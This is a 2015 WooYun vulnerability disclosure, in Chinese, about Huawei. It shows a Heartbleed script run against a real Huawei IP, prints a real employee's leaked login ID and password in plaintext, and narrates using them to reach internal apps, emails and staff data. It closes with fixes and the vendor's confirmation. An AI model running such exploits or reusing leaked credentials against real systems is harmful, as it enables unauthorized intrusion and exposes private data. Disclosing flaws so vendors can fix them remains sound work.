当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126365

漏洞标题:某漏洞导致的一次对华为成功漫游(影响大量内部系统、敏感邮件、人员架构等)

相关厂商:华为技术有限公司

漏洞作者: fuckadmin

提交时间:2015-07-12 23:57

修复时间:2015-08-27 18:32

公开时间:2015-08-27 18:32

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-12: 细节已通知厂商并且等待厂商处理中
2015-07-13: 厂商已经确认,细节仅向厂商公开
2015-07-23: 细节向核心白帽子及相关领域专家公开
2015-08-02: 细节向普通白帽子公开
2015-08-12: 细节向实习白帽子公开
2015-08-27: 细节向公众公开

简要描述:

正面进不了华为,看我如何绕过变态的华为内部认证,进入内部网络。

详细说明:

在杀器王子提交的漏洞中,已经成功的抓取到华为某位员工的内部账号和密码。
1. WooYun: 华为某重要服务器存在心脏滴血漏洞可以查看密码

python openssl.py 119.145.14.47 443|more
[{"type": 0, "description": "IP:119.145.14.47:443<br>\u5b58\u5728openssl \u4fe1\
u606f\u6cc4\u9732\uff1a <br>\n.@....SC[...r....+..H...9........w.3....f.....\".!
.9.8.........5.............................3.2.....E.D...../...A................
.................I...........4.2................................................
...#.......PF..G.. iPhone OS8.1..x-device-name: iPhone..x-device-type: ios..x-cl
ient-version: V2.2.0.210..Content-Length: 85....{. \"appId\" : \"espace\",.
\"loginName\" : \"x00246451\",. \"password\" : \"whXF07!@\".}


账号:x00246451
密码:whXF07!@

漏洞证明:

2.成功登录员工系统
差旅平台

1.png


员工职位信息

2.png


内部华为心声平台

3.png


围观内部员工吐槽

4.png


3.虽然得到了内部员工的账号信息,但还是无法正面通过华为变态的硬件认证进行VPN、mail、oa等内部系统,进一步扩大战果。
但华为安全人员万万没想到的是,如果通过内部APP呢?
4.成功进行内部系统
http://w3m.huawei.com/m/servlet/index?locale=zh_CN
由于该站点提供了内部使用的APP,好家伙,我们来测试下。
(1)进入w3 mobile

5.png


(2)查看内部公司文件

6.png


(3)查看内部公告

7.png


(4)进入华为微博

8.png


(5)查看所属部门及其微博信息

9.png


(6)南风潮是什么鬼?居然有3W员工?

10.png


(7)拿到了偶像的邮箱,么么哒!

11.png


(8)大量内部应用哦!

12.png


(9)内部交流邮件

13.png


14.png


这封邮件已经充分说明,想要漫游华为内网的难度,内网最难不是系统,而是人,华为细节入手抓起,值得学习。
(10)huawei ilearnling

16.png


17.png


最喜欢听任总的成功学了。
(11)travel one

18.png


(12)any office

19.png


(13)APP还会提示无安全风险哦!

20.png

修复方案:

1.增加内部APP加入动态认证,比如短信认证。
2.增加登录时硬件认证,对不经常登录的设备进行限制。
3.虽然部分APP:如Any office、ONE,都增加了root权限手机无法使用方法,但只要使用非ROOT手机,即可破解登录限制。

版权声明:转载请注明来源 fuckadmin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-13 18:30

厂商回复:

感谢白帽子对华为公司IT安全的关注,也非常感谢白帽子提出的改进建议,我们已通知该名员工修改密码,并通知了相关的业务部门。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-12 23:58 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    NB啊。。能进内网屌屌的

  2. 2015-07-13 08:01 | f4ck ( 实习白帽子 | Rank:42 漏洞数:7 | 有些人很牛B,一个漏洞能刷成N个。)

    @zeracker 这种有打雷嘛?

  3. 2015-07-13 17:18 | qhwlpg ( 普通白帽子 | Rank:226 漏洞数:54 | 潜心代码审计。)

    吓着我了。。

  4. 2015-07-13 18:40 | BashLinux ( 路人 | Rank:2 漏洞数:1 | 高价 长期收购SSH默认账号,密码,)

    能进内网的,非常人

  5. 2015-07-13 21:49 | Chinalover ( 路人 | Rank:16 漏洞数:4 | 你看得到我打在屏幕上的字,却看不到我落在...)

    正面上不了华为,看我后入式

  6. 2015-08-28 15:51 | Mr.Zheng ( 路人 | Rank:20 漏洞数:8 | Testing software)

    华为的工号都是通用的